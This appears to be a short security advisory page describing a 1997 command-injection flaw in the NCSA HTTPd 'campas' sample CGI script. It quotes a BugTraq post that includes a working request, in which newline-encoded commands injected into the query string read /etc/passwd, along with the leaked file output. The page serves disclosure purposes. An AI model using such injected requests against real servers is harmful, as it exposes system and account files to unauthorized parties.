|
NCSA HTTPd campas sample script Vulnerability
The following exploit description is quoted from the BugTraq message posted by Francisco Torres <ftorres@castor.javeriana.edu.co> on July 15, 1997. > telnet target 80 [...] GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a <PRE> root:x:0:1:Super-User:/export/home/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false [...] |
|
|
Privacy Statement |